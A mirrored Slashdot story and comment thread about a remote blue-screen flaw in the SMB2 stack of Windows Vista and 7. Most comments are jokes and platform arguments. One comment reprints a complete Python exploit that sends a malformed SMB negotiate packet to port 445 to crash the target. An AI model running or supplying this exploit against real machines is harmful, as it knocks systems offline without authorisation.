Slashdot Mirror

← Back to Stories (view on slashdot.org)

Windows 7 Reintroduces Remote BSoD

Posted by timothy on from the no-such-thing-as-perfect-security dept.

David Gerard writes "Remember the good old days of the 1990s, when you could teardrop attack any Windows user who'd annoyed you and bluescreen them? Microsoft reintroduces this popular feature in Windows 7, courtesy the rewritten TCP/IP and SMB2 stacks. Well done, guys! Another one for the Windows 7 Drinking Game."

14 of 427 comments (clear)

  1. Local? by MindStalker · · Score: 5, Interesting

    If it relies on a SMB2 request it is most likely restricted form request inside the LAN.
    Either way, still bad.

    1. Re:Local? by poetmatt · · Score: 5, Funny

      well, now I know how to win any lan party contests :)

    2. Re:Local? by GameMaster · · Score: 5, Funny

      NOBODY EXPECT ATTACKS FROM INSIDE YOUR LAN!!!! Their chief weapon is surprise...surprise and fear...fear and surprise.... Their two weapons are fear and surprise...and ruthless efficiency.... Their *three* weapons are fear, surprise, and ruthless efficiency...and an almost fanatical devotion to rms.... Their *four*...no... *Amongst* their weapons.... Amongst their weaponry...are such elements as fear, surprise.... I'll come in again.

      --

      Rules of Conduct:
      #1 - The DM is always right.
      #2 - If the DM is wrong, see rule #1
  2. I knew Windows 7 was too good to be true by commodore64_love · · Score: 5, Funny

    - Shiny-new interface.
    - No annoying "are you sure" popups every 30 seconds like Vista.
    - Can run on a 1 gigabyte machine without slowing to a crawl.

    It simply wasn't possible for Microsoft to make such a great perfect OS without including a flaw.

    --
    "I disapprove of what you say, but I will defend to the death your right to say it." - historian Evelyn Beatrice Hall
  3. Not consistent by james_a_craig · · Score: 5, Interesting

    Having actually tried this on three windows 7 machines now, it doesn't seem to work on every machine. (Actually, it's yet to work on any here, although I hear tell that it does work on some). There's something more to this than just "that data crashes it every time".

    1. Re:Not consistent by Lulfas · · Score: 5, Informative

      It's because SMB and SMBv2 are firewalled straight out of the box. You have to turn on homegroup and then attempt to exploit. Not quite the "OMG SKY IS FALLING" that the summary leads us to believe.

  4. Correction! by David+Gerard · · Score: 5, Informative

    I was terribly unfair to Microsoft in the story summary (which is pretty much what I wrote) - per TFA, this flaw is actually an exciting new feature of Vista, not of Windows 7.

    And before anyone says "but Win7 is beta!" - this flaw is present in the gold master.

    --
    http://rocknerd.co.uk
  5. Ahh, nice to see ... by UncHellMatt · · Score: 5, Funny

    ...that my fellow Boston Public School graduates are writing for seclists.org.

    Section V: "An attacker can remotly crash without no user interaction, any Vista/Windows 7 machine with SMB enable. "

    Yes, because we been done had seen that explot in the pasts.

    Dear $DEITY, are there no proof readers or editors alive on these sites?

  6. Please grow up, you're driving us away by Anonymous Coward · · Score: 5, Insightful

    Hi. I'm an adult. I work as a software engineer.

    I cannot join in with the Linux community because of you people. You're just *too awful*. Instead of accepting that this stuff happens and it's bad, you childishly nerdsnort and start writing Microsoft with a dollar sign instead of an S, acting as if this stuff is some amazing manifestation of idiocy rather than a likely consequence of using a mainstream OS developed with time and budgetary constraints. It's going to have stupid bugs. Get the fuck over it.

    I would like to join in with the Linux community, but all I ever hear is this pathetic nyerr-nyerr-nyerr garbage.

    If you want to attract intelligent, grown-up people to Linux you need to stop doing certain things.

    1) Don't act as if users of other operating systems are less intelligent than you. It turns out that Linux-advocacy isn't the entire world, and that leaders in different fields (or even this one!) might be using Windows. They're not "lusers", they just have priorities different from your own.

    2) Don't act as if Linux hasn't had equally stupid stuff happen to it. Yes, it's a different process altogether, and I would dare say that bugs are less likely due to its open source nature, but they still happen. One that I can remember off the top of my head is Debian's guessable SSL keys.

    3) Try—for ten minutes—to give the impression that half of your time isn't devoted to bashing an OS you believe is irrelevant.

    4) For good measure try cutting out the xkcd worship and meme-spouting. We might be able to relate to you people if you acted as if you weren't cut from the same distasteful mold.

    1. Re:Please grow up, you're driving us away by Anonymous Coward · · Score: 5, Insightful

      The pubertal masses of Slashdot != The Linux community

    2. Re:Please grow up, you're driving us away by Ash-Fox · · Score: 5, Informative

      I cannot join in with the Linux community because of you people.

      I'm sorry, Sir. This is not the Linux community, this is the Slashdot community.

      If you want the Linux community, go to http://www.kernel.org/

      I would like to join in with the Linux community, but all I ever hear is this pathetic nyerr-nyerr-nyerr garbage.

      If you look on kernel.org, there is none of this garbage. You are mistaken.

      --
      Change is certain; progress is not obligatory.
  7. For all who want a more technical summary of TFA: by Seth+Kriticos · · Score: 5, Informative

    Vulnerable systems are all with SMB2 drivers: Vista, W7 and probably Server 2008

    The exploit (which is actually ridiculously simple) goes as follows:

    #!/usr/bin/python
    # When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field it dies with a
    # PAGE_FAULT_IN_NONPAGED_AREA from socket import socket
    from time import sleep

    host = "IP_ADDR", 445
    buff = (
    "\x00\x00\x00\x90" # Begin SMB header: Session message
    "\xff\x53\x4d\x42" # Server Component: SMB
    "\x72\x00\x00\x00" # Negociate Protocol
    "\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
    "\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
    "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
    "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
    "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
    "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
    "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
    "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
    "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
    "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
    "\x30\x30\x32\x00"
    )
    s = socket()
    s.connect(host)
    s.send(buff)
    s.close()

    Current problem solution: disable the SMB protocol on your infrastructure..

    Now please excuse me, I have go and play a bit with our network admin.. /joke

  8. Re:"RE"-introducing? by David+Gerard · · Score: 5, Funny

    Yeah, reading error on my part. Sorry about that. Let's give Vista credit where it's due!

    --
    http://rocknerd.co.uk
  9. Re:"RE"-introducing? by David+Gerard · · Score: 5, Funny

    But Macs cost too much, and Linux is too hard. And Microsoft only hits me because he loves me.

    --
    http://rocknerd.co.uk